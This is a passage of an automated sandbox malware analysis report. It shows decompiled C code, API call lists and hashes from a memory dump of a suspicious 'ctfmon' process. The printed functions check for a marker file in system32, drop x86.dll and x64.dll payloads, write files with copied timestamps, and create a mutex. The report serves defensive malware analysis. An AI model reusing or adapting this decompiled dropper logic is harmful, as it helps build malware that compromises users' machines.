                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*$/LU5/
                                                • API String ID: 4207308331-1555885800
                                                • Opcode ID: e9186607ce05e9c151e07e8aabcfc7668df535e9be4125fe0d3552a338905a11
                                                • Instruction ID: 6e1cf2a7a9d1877765c8046328b879c260c98f1d2b6018cbe88b334f139b6ed2
                                                • Opcode Fuzzy Hash: e9186607ce05e9c151e07e8aabcfc7668df535e9be4125fe0d3552a338905a11
                                                • Instruction Fuzzy Hash: 47F17A70900729DFEB20DF64CC84BAAB7B9AB05304F5545E9E44EA7292DB749E88CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096FC10 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 254filetimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 96fc10-96fc2e 124 96fc37-96fc46 123->124 125 96fc30-96fc32 call 96f2d0 123->125 127 96fc5f-96fc62 124->127 128 96fc48-96fc5c call 970a5d 124->128 125->124 130 96fc64-96fc6b call 96ec60 127->130 131 96fc6e-96fc74 127->131 130->131 132 96fc76-96fc7a 131->132 133 96fcc9-96fce1 call 96f4e0 131->133 137 96fcc2-96fcc7 132->137 138 96fc7c-96fc80 132->138 143 96fce3-96fce5 133->143 144 96fd1b-96fd21 133->144 137->132 137->133 138->137 140 96fc82-96fc89 138->140 140->137 142 96fc8b-96fcbf call 96e7c0 140->142 142->137 148 96fce7-96fce9 143->148 149 96fcfd 143->149 146 96fd36-96fd3e 144->146 147 96fd23-96fd25 144->147 154 96fd40-96fd4b 146->154 152 96fd27-96fd29 147->152 153 96fd2b 147->153 148->149 155 96fceb-96fced 148->155 150 96fcff-96fd18 call 96fb00 call 970a5d 149->150 152->153 157 96fd2e-96fd34 152->157 153->157 154->154 158 96fd4d-96fd4f 154->158 159 96fcf5-96fcfb 155->159 160 96fcef-96fcf3 155->160 157->146 157->147 162 96fd51-96fd57 158->162 163 96fd59-96fd62 158->163 159->150 160->149 160->159 164 96fd8b-96fdb1 wsprintfA 162->164 165 96ff08-96ff0f call 970e90 163->165 166 96fd68-96fd78 163->166 170 96fdd2-96fe02 call 96fb00 CreateFileA 164->170 168 96fdb3-96fdd0 wsprintfA 166->168 169 96fd7a-96fd7c 166->169 168->170 169->168 173 96fd7e-96fd80 169->173 178 96fe04-96fe19 call 970a5d 170->178 179 96fe1c-96fe30 call 96ef10 170->179 173->164 176 96fd82-96fd89 173->176 176->164 176->168 184 96fe45-96fe4f 179->184 185 96fe32-96fe37 call 970ab4 179->185 187 96fe50-96fe71 call 96f090 184->187 188 96fe3c-96fe3f 185->188 191 96fed7 187->191 192 96fe73-96fe75 187->192 188->184 193 96fee1-96feea FindCloseChangeNotification call 96f2d0 191->193 194 96fe77 192->194 195 96fea1-96feab 192->195 199 96feef-96ff05 call 970a5d 193->199 197 96fe94-96fe9b 194->197 198 96fe79-96fe92 WriteFile 194->198 195->193 201 96fe9d-96fe9f 197->201 202 96feb9-96fed5 SetFileTime 197->202 198->197 200 96fead-96feb7 198->200 200->193 201->187 201->195 202->193
                                                C-Code - Quality: 84%
                                                			E0096FC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v528;
				struct _FILETIME _v544;
				struct _FILETIME _v552;
				struct _FILETIME _v560;
				long _v564;
				char _v828;
				char _v829;
				struct _OVERLAPPED* _v836;
				long _v840;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				char _t81;
				void* _t83;
				signed int _t91;
				void* _t97;
				long _t100;
				signed int _t110;
				void* _t111;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				signed int* _t133;
				signed int _t134;
				void* _t136;
				intOrPtr _t142;
				signed int* _t144;
				signed int* _t145;
				signed int _t148;
				signed int* _t156;
				signed int* _t167;
				signed int* _t174;
				signed int _t175;
				void* _t181;
				signed int _t183;
				signed int* _t184;
				long _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				signed int _t190;
				signed int _t192;
				signed int _t197;
				void* _t198;
				void* _t200;

				_t166 = __edx;
				_t192 = _t197;
				_t198 = _t197 - 0x344;
				_t74 =  *0x98f008; // 0x35554c2f
				_v8 = _t74 ^ _t192;
				_t133 = _a8;
				_t174 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					E0096F2D0( *((intOrPtr*)(__ecx)), __edx);
				}
				_t76 =  *_t174;
				_t142 = _a4;
				_t174[1] = 0xffffffff;
				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
						E0096EC60(_t76);
						_t142 = _a4;
					}
					_t77 =  *_t174;
					_push(_t181);
					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
						do {
							_t190 =  *_t174;
							__eflags = _t190;
							if(_t190 != 0) {
								__eflags =  *(_t190 + 0x18);
								if( *(_t190 + 0x18) != 0) {
									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
										_t20 = _t190 + 0x28; // 0x28
										_t166 = _t20;
										_t21 = _t190 + 0x78; // 0x78
										_t125 = E0096E7C0(_t190, _t20, _t21, 0, 0);
										_t142 = _a4;
										_t198 = _t198 - 0x10 + 0x1c;
										asm("sbb eax, eax");
										_t127 =  ~_t125 + 1;
										__eflags = _t127;
										 *(_t190 + 0x18) = _t127;
									}
								}
							}
							_t120 =  *_t174;
							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
					}
					E0096F4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
					__eflags = _v564 & 0x00000010;
					_t80 =  *_t133;
					if((_v564 & 0x00000010) == 0) {
						_t167 = _t133;
						_t144 = _t133;
						__eflags = _t80;
						while(_t80 != 0) {
							__eflags = _t80 - 0x2f;
							if(_t80 == 0x2f) {
								L23:
								_t32 =  &(_t144[0]); // 0x965105
								_t167 = _t32;
							} else {
								__eflags = _t80 - 0x5c;
								if(_t80 == 0x5c) {
									goto L23;
								}
							}
							_t33 =  &(_t144[0]); // 0x996a4c
							_t80 =  *_t33;
							_t144 =  &(_t144[0]);
							__eflags = _t80;
						}
						_t145 = _t133;
						_t183 =  &_v268 - _t133;
						__eflags = _t183;
						do {
							_t81 =  *_t145;
							_t35 =  &(_t145[0]); // 0x996a4c
							_t145 = _t35;
							 *((char*)(_t183 + _t145 - 1)) = _t81;
							__eflags = _t81;
						} while (_t81 != 0);
						__eflags = _t167 - _t133;
						if(_t167 != _t133) {
							_t83 = _t167 - _t133;
							__eflags = _t83 - 0x104;
							if(_t83 >= 0x104) {
								E00970E90();
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t183);
								_t184 = _t145;
								_push(_t174);
								__eflags = _t184[1] - 0xffffffff;
								if(_t184[1] != 0xffffffff) {
									E0096F2D0( *_t184, _t167);
								}
								_t175 =  *_t184;
								_t184[1] = 0xffffffff;
								__eflags = _t175;
								if(_t175 != 0) {
									__eflags =  *(_t175 + 0x7c);
									if( *(_t175 + 0x7c) != 0) {
										E0096F2D0(_t175, _t167);
									}
									_push(_t133);
									_t134 =  *_t175;
									__eflags = _t134;
									if(_t134 != 0) {
										__eflags =  *((char*)(_t134 + 0x10));
										if( *((char*)(_t134 + 0x10)) != 0) {
											CloseHandle( *(_t134 + 4));
										}
										_push(0x20);
										E00970AA1(_t134);
										_t198 = _t198 + 8;
									}
									L00975A36(_t175);
								}
								__eflags = 0;
								 *_t184 = 0;
								return 0;
							} else {
								 *((char*)(_t192 + _t83 - 0x108)) = 0;
								_t91 = _v268;
								__eflags = _t91 - 0x2f;
								if(_t91 == 0x2f) {
									L35:
									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
									_t200 = _t198 + 0x10;
									_t148 = 0;
									__eflags = 0;
								} else {
									__eflags = _t91 - 0x5c;
									if(_t91 == 0x5c) {
										goto L35;
									} else {
										__eflags = _t91;
										if(_t91 == 0) {
											goto L34;
										} else {
											__eflags = _v267 - 0x3a;
											if(_v267 == 0x3a) {
												goto L35;
											} else {
												goto L34;
											}
										}
									}
								}
								goto L36;
							}
						} else {
							_v268 = _t81;
							L34:
							_t183 =  &(_t174[0x50]);
							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
							_t200 = _t198 + 0x14;
							_t148 = _t183;
							L36:
							E0096FB00(_t148,  &_v268); // executed
							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
							_t136 = _t97;
							__eflags = _t136 - 0xffffffff;
							if(_t136 != 0xffffffff) {
								E0096EF10( *_t174, _t174[0x4e]); // executed
								__eflags = _t174[0x4f];
								if(__eflags == 0) {
									_push(0x4000); // executed
									_t111 = E00970AB4(_t183, __eflags); // executed
									_t200 = _t200 + 4;
									_t174[0x4f] = _t111;
								}
								_v836 = 0;
								while(1) {
									_t170 = _t174[0x4f];
									_t100 = E0096F090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
									_t186 = _t100;
									_t200 = _t200 + 8;
									__eflags = _t186 - 0xffffff96;
									if(_t186 == 0xffffff96) {
										break;
									}
									__eflags = _t186;
									if(__eflags < 0) {
										L47:
										_v836 = 0x5000000;
									} else {
										if(__eflags <= 0) {
											L45:
											__eflags = _v829;
											if(_v829 != 0) {
												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
											} else {
												__eflags = _t186;
												if(_t186 != 0) {
													continue;
												} else {
													goto L47;
												}
											}
										} else {
											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
											__eflags = _t110;
											if(_t110 == 0) {
												_v836 = 0x400;
											} else {
												goto L45;
											}
										}
									}
									L51:
									FindCloseChangeNotification(_t136); // executed
									E0096F2D0( *_t174, _t170);
									__eflags = _v8 ^ _t192;
									_pop(_t187);
									return E00970A5D(_v8 ^ _t192, _t187);
									goto L64;
								}
								_v836 = 0x1000;
								goto L51;
							} else {
								_pop(_t188);
								__eflags = _v8 ^ _t192;
								return E00970A5D(_v8 ^ _t192, _t188);
							}
						}
					} else {
						__eflags = _t80 - 0x2f;
						if(_t80 == 0x2f) {
							L18:
							_t156 = 0;
							__eflags = 0;
						} else {
							__eflags = _t80 - 0x5c;
							if(_t80 == 0x5c) {
								goto L18;
							} else {
								__eflags = _t80;
								if(_t80 == 0) {
									L17:
									_t156 =  &(_t174[0x50]);
								} else {
									__eflags = _t133[0] - 0x3a;
									if(_t133[0] == 0x3a) {
										goto L18;
									} else {
										goto L17;
									}
								}
							}
						}
						E0096FB00(_t156, _t133);
						_pop(_t189);
						__eflags = _v8 ^ _t192;
						return E00970A5D(_v8 ^ _t192, _t189);
					}
				} else {
					return E00970A5D(_v8 ^ _t192, _t181);
				}
				L64:
			}























































                                                0x0096fc10
                                                0x0096fc11
                                                0x0096fc13
                                                0x0096fc19
                                                0x0096fc20
                                                0x0096fc24
                                                0x0096fc28
                                                0x0096fc2e
                                                0x0096fc32
                                                0x0096fc32
                                                0x0096fc37
                                                0x0096fc39
                                                0x0096fc3c
                                                0x0096fc46
                                                0x0096fc5f
                                                0x0096fc62
                                                0x0096fc66
                                                0x0096fc6b
                                                0x0096fc6b
                                                0x0096fc6e
                                                0x0096fc70
                                                0x0096fc71
                                                0x0096fc74
                                                0x0096fc76
                                                0x0096fc76
                                                0x0096fc78
                                                0x0096fc7a
                                                0x0096fc7c
                                                0x0096fc80
                                                0x0096fc85
                                                0x0096fc86
                                                0x0096fc89
                                                0x0096fc9c
                                                0x0096fc9f
                                                0x0096fca2
                                                0x0096fca2
                                                0x0096fca7
                                                0x0096fcaf
                                                0x0096fcb4
                                                0x0096fcb7
                                                0x0096fcbc
                                                0x0096fcbe
                                                0x0096fcbe
                                                0x0096fcbf
                                                0x0096fcbf
                                                0x0096fc89
                                                0x0096fc80
                                                0x0096fcc2
                                                0x0096fcc4
                                                0x0096fcc4
                                                0x0096fc76
                                                0x0096fcd3
                                                0x0096fcd8
                                                0x0096fcdf
                                                0x0096fce1
                                                0x0096fd1b
                                                0x0096fd1d
                                                0x0096fd1f
                                                0x0096fd21
                                                0x0096fd23
                                                0x0096fd25
                                                0x0096fd2b
                                                0x0096fd2b
                                                0x0096fd2b
                                                0x0096fd27
                                                0x0096fd27
                                                0x0096fd29
                                                0x00000000
                                                0x00000000
                                                0x0096fd29
                                                0x0096fd2e
                                                0x0096fd2e
                                                0x0096fd31
                                                0x0096fd32
                                                0x0096fd32
                                                0x0096fd3c
                                                0x0096fd3e
                                                0x0096fd3e
                                                0x0096fd40
                                                0x0096fd40
                                                0x0096fd42
                                                0x0096fd42
                                                0x0096fd45
                                                0x0096fd49
                                                0x0096fd49
                                                0x0096fd4d
                                                0x0096fd4f
                                                0x0096fd5b
                                                0x0096fd5d
                                                0x0096fd62
                                                0x0096ff08
                                                0x0096ff0d
                                                0x0096ff0e
                                                0x0096ff0f
                                                0x0096ff10
                                                0x0096ff11
                                                0x0096ff13
                                                0x0096ff14
                                                0x0096ff18
                                                0x0096ff1c
                                                0x0096ff1c
                                                0x0096ff21
                                                0x0096ff23
                                                0x0096ff2a
                                                0x0096ff2c
                                                0x0096ff2e
                                                0x0096ff32
                                                0x0096ff36
                                                0x0096ff36
                                                0x0096ff3b
                                                0x0096ff3c
                                                0x0096ff3e
                                                0x0096ff40
                                                0x0096ff42
                                                0x0096ff46
                                                0x0096ff4b
                                                0x0096ff4b
                                                0x0096ff51
                                                0x0096ff54
                                                0x0096ff59
                                                0x0096ff59
                                                0x0096ff5d
                                                0x0096ff65
                                                0x0096ff66
                                                0x0096ff69
                                                0x0096ff6c
                                                0x0096fd68
                                                0x0096fd68
                                                0x0096fd70
                                                0x0096fd76
                                                0x0096fd78
                                                0x0096fdb3
                                                0x0096fdc7
                                                0x0096fdcd
                                                0x0096fdd0
                                                0x0096fdd0
                                                0x0096fd7a
                                                0x0096fd7a
                                                0x0096fd7c
                                                0x00000000
                                                0x0096fd7e
                                                0x0096fd7e
                                                0x0096fd80
                                                0x00000000
                                                0x0096fd82
                                                0x0096fd82
                                                0x0096fd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fd89
                                                0x0096fd80
                                                0x0096fd7c
                                                0x00000000
                                                0x0096fd78
                                                0x0096fd51
                                                0x0096fd51
                                                0x0096fd8b
                                                0x0096fd93
                                                0x0096fda6
                                                0x0096fdac
                                                0x0096fdaf
                                                0x0096fdd2
                                                0x0096fdd8
                                                0x0096fdf7
                                                0x0096fdfd
                                                0x0096fdff
                                                0x0096fe02
                                                0x0096fe24
                                                0x0096fe29
                                                0x0096fe30
                                                0x0096fe32
                                                0x0096fe37
                                                0x0096fe3c
                                                0x0096fe3f
                                                0x0096fe3f
                                                0x0096fe45
                                                0x0096fe50
                                                0x0096fe50
                                                0x0096fe64
                                                0x0096fe69
                                                0x0096fe6b
                                                0x0096fe6e
                                                0x0096fe71
                                                0x00000000
                                                0x00000000
                                                0x0096fe73
                                                0x0096fe75
                                                0x0096fea1
                                                0x0096fea1
                                                0x0096fe77
                                                0x0096fe77
                                                0x0096fe94
                                                0x0096fe94
                                                0x0096fe9b
                                                0x0096fecf
                                                0x0096fe9d
                                                0x0096fe9d
                                                0x0096fe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fe9f
                                                0x0096fe79
                                                0x0096fe8a
                                                0x0096fe90
                                                0x0096fe92
                                                0x0096fead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fe92
                                                0x0096fe77
                                                0x0096fee1
                                                0x0096fee2
                                                0x0096feea
                                                0x0096fef8
                                                0x0096fefa
                                                0x0096ff05
                                                0x00000000
                                                0x0096ff05
                                                0x0096fed7
                                                0x00000000
                                                0x0096fe04
                                                0x0096fe04
                                                0x0096fe0f
                                                0x0096fe19
                                                0x0096fe19
                                                0x0096fe02
                                                0x0096fce3
                                                0x0096fce3
                                                0x0096fce5
                                                0x0096fcfd
                                                0x0096fcfd
                                                0x0096fcfd
                                                0x0096fce7
                                                0x0096fce7
                                                0x0096fce9
                                                0x00000000
                                                0x0096fceb
                                                0x0096fceb
                                                0x0096fced
                                                0x0096fcf5
                                                0x0096fcf5
                                                0x0096fcef
                                                0x0096fcef
                                                0x0096fcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096fcf3
                                                0x0096fced
                                                0x0096fce9
                                                0x0096fd01
                                                0x0096fd06
                                                0x0096fd0e
                                                0x0096fd18
                                                0x0096fd18
                                                0x0096fc48
                                                0x0096fc5c
                                                0x0096fc5c
                                                0x00000000

                                                APIs
                                                • wsprintfA.USER32 ref: 0096FDA6
                                                • wsprintfA.USER32 ref: 0096FDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0096FDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0096FE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 0096FECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096FEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$/LU5/$:
                                                • API String ID: 2340708895-161730245
                                                • Opcode ID: 59842aebca33c19254238887712430c72566f31291e265eef06171f0db35c34d
                                                • Instruction ID: ece078519d8305a2a247ddefc80bfffa0b35d8409bc82b354fb145fb845a4d62
                                                • Opcode Fuzzy Hash: 59842aebca33c19254238887712430c72566f31291e265eef06171f0db35c34d
                                                • Instruction Fuzzy Hash: A19150716002089FCB35DF24ECA4BE9B7B9BF45300F1045BAE99A972C1D775AE85CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00966FE0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 102fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E00966FE0(void* __ebx, CHAR* __ecx, void* __edi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void* __esi;
				signed int _t17;
				void* _t23;
				void* _t29;
				void* _t30;
				void* _t42;
				CHAR* _t59;
				signed int _t60;

				_t58 = __edi;
				_t17 =  *0x98f008; // 0x35554c2f
				_v8 = _t17 ^ _t60;
				_t59 = __ecx;
				E00973440(__edi,  &_v268, 0, 0x104);
				_push("Diagnostics.txt");
				E00965180( &_v268, 0x104, "%s\%s", _t59);
				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t66 = _t23 - 0xffffffff;
				if(_t23 == 0xffffffff) {
					L5:
					__eflags = _v8 ^ _t60;
					return E00970A5D(_v8 ^ _t60, _t59);
				} else {
					FindCloseChangeNotification(_t23); // executed
					CreateDirectoryA(_t59, 0); // executed
					_t29 = E00967140(_t66,  &_v268); // executed
					_t67 = _t29;
					if(_t29 == 0) {
						goto L5;
					} else {
						_t30 = E00965010(__ebx, _t59, _t58, _t67); // executed
						_t68 = _t30;
						if(_t30 == 0) {
							goto L5;
						} else {
							DeleteFileA( &_v268);
							E00973440(_t58,  &_v528, 0, 0x104);
							E00973440(_t58,  &_v788, 0, 0x104);
							E00965180( &_v528, 0x104, "%s\\x86.dll", _t59);
							E00965180( &_v788, 0x104, "%s\\x64.dll", _t59);
							_t42 = E00967140(_t68,  &_v528);
							_t69 = _t42;
							if(_t42 == 0) {
								goto L5;
							} else {
								E00967140(_t69,  &_v788);
								return E00970A5D(_v8 ^ _t60, _t59);
							}
						}
					}
				}
			}















                                                0x00966fe0
                                                0x00966fe9
                                                0x00966ff0
                                                0x00966fff
                                                0x00967004
                                                0x00967009
                                                0x00967020
                                                0x0096703c
                                                0x00967042
                                                0x00967045
                                                0x0096712d
                                                0x00967132
                                                0x0096713d
                                                0x0096704b
                                                0x0096704c
                                                0x00967055
                                                0x00967067
                                                0x0096706f
                                                0x00967071
                                                0x00000000
                                                0x00967077
                                                0x0096707f
                                                0x00967084
                                                0x00967086
                                                0x00000000
                                                0x0096708c
                                                0x00967093
                                                0x009670a7
                                                0x009670ba
                                                0x009670d1
                                                0x009670e8
                                                0x009670f9
                                                0x00967101
                                                0x00967103
                                                0x00000000
                                                0x00967105
                                                0x00967111
                                                0x0096712c
                                                0x0096712c
                                                0x00967103
                                                0x00967086
                                                0x00967071

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0096703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0096704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00967055
                                                • DeleteFileA.KERNEL32(?), ref: 00967093
                                                  • Part of subcall function 00967140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0096718D
                                                  • Part of subcall function 00967140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 009671A5
                                                  • Part of subcall function 00967140: CloseHandle.KERNEL32(00000000,?,?), ref: 009671B0
                                                  • Part of subcall function 00967140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 009671BE
                                                  • Part of subcall function 00967140: LocalFree.KERNELBASE(00000000,?,?), ref: 009671C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$/LU5/$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-2503390260
                                                • Opcode ID: f4ca093bb7fdd08896f218be3f1f256851672f7ba8f44ce60b344957c1dda961
                                                • Instruction ID: 656479cb4e5c3e35c170b266293c5a27fb61087855f1d7c1057b4753406268cd
                                                • Opcode Fuzzy Hash: f4ca093bb7fdd08896f218be3f1f256851672f7ba8f44ce60b344957c1dda961
                                                • Instruction Fuzzy Hash: 9E31DDB1A4531877DA20F7A0DC4BFDA736C9F46718F1140D1B658B72C1D6B0DB848751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009649E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 9649e0-964a0e CreateFileA 236 964a10-964a3f GetFileSizeEx LocalAlloc 235->236 237 964a48-964a50 235->237 238 964a51-964a5e 236->238 239 964a41-964a42 CloseHandle 236->239 240 964a60-964a7c ReadFile 238->240 241 964a8c-964a8f 238->241 239->237 242 964a7e-964a87 240->242 243 964a89 240->243 244 964a91-964aaa CloseHandle LocalFree 241->244 245 964aab-964ab9 CloseHandle 241->245 242->240 242->243 243->241
                                                C-Code - Quality: 67%
                                                			E009649E0(void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				long _v32;
				void* _t15;
				void* _t18;
				long _t19;
				long _t27;
				void* _t29;
				void** _t30;
				struct _OVERLAPPED** _t33;
				long _t34;

				_v12 = __edx;
				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t29 = _t15;
				if(_t29 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t29,  &_v32);
					_t34 = _v32;
					_v20 = _t34;
					_t18 = LocalAlloc(0x40, _t34); // executed
					_t30 = _v12;
					 *_t30 = _t18;
					if(_t18 != 0) {
						_t33 = _a4;
						_t19 = _t34;
						 *_t33 = 0;
						if(_t19 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
								_t27 = _v16;
								if(_t27 == 0) {
									break;
								}
								 *_t33 =  *_t33 + _t27;
								_t34 = _t34 - _t27;
								_t30 = _v12;
								if(_t34 > 0) {
									continue;
								}
								break;
							}
							_t19 = _v20;
						}
						_push(_t29);
						if( *_t33 == _t19) {
							CloseHandle();
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0;
						}
					} else {
						CloseHandle(_t29);
						goto L3;
					}
				}
			}
















                                                0x00964a00
                                                0x00964a03
                                                0x00964a09
                                                0x00964a0e
                                                0x00964a48
                                                0x00964a50
                                                0x00964a10
                                                0x00964a13
                                                0x00964a1c
                                                0x00964a23
                                                0x00964a29
                                                0x00964a2f
                                                0x00964a32
                                                0x00964a38
                                                0x00964a3b
                                                0x00964a3f
                                                0x00964a51
                                                0x00964a54
                                                0x00964a56
                                                0x00964a5e
                                                0x00964a60
                                                0x00964a65
                                                0x00964a71
                                                0x00964a77
                                                0x00964a7c
                                                0x00000000
                                                0x00000000
                                                0x00964a7e
                                                0x00964a80
                                                0x00964a82
                                                0x00964a87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00964a87
                                                0x00964a89
                                                0x00964a89
                                                0x00964a8c
                                                0x00964a8f
                                                0x00964aab
                                                0x00964ab9
                                                0x00964a91
                                                0x00964a91
                                                0x00964a9c
                                                0x00964aaa
                                                0x00964aaa
                                                0x00964a41
                                                0x00964a42
                                                0x00000000
                                                0x00964a42
                                                0x00964a3f

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,00964AE6,?), ref: 00964A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 00964A23
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,73B76490), ref: 00964A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 00964A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 00964A9C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 009649FB
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: 3ec6af003fe1f107d19e8a504224155df2857ac54bc5bb89c0eef71ce9e804e4
                                                • Instruction ID: eb7b5cac5eb39a15409ea8808e6010f4e36b5fad7362f1d80a4b44099725e797
                                                • Opcode Fuzzy Hash: 3ec6af003fe1f107d19e8a504224155df2857ac54bc5bb89c0eef71ce9e804e4
                                                • Instruction Fuzzy Hash: 0221F175A44209BBDB108FE5EC89BAEBBBCEF48724F100191F904E7380D7709844CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00969310 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 51synchronizationnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E00969310() {
				signed int _v8;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v444;
				void* __esi;
				signed int _t12;
				void* _t16;
				signed int _t18;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				signed int _t33;

				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
				_t12 =  *0x98f008; // 0x35554c2f
				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
				__imp__#115(0x202,  &_v444, _t29); // executed
				asm("movaps xmm0, [0x98cf90]");
				asm("movups [esp+0x1a8], xmm0");
				_v32 = 0x2d383132;
				_v28 = 0x44383732;
				_v24 = 0x7d454536;
				_v20 = 0;
				_t16 = CreateMutexA(0, 1,  &_v48); // executed
				_t30 = _t16;
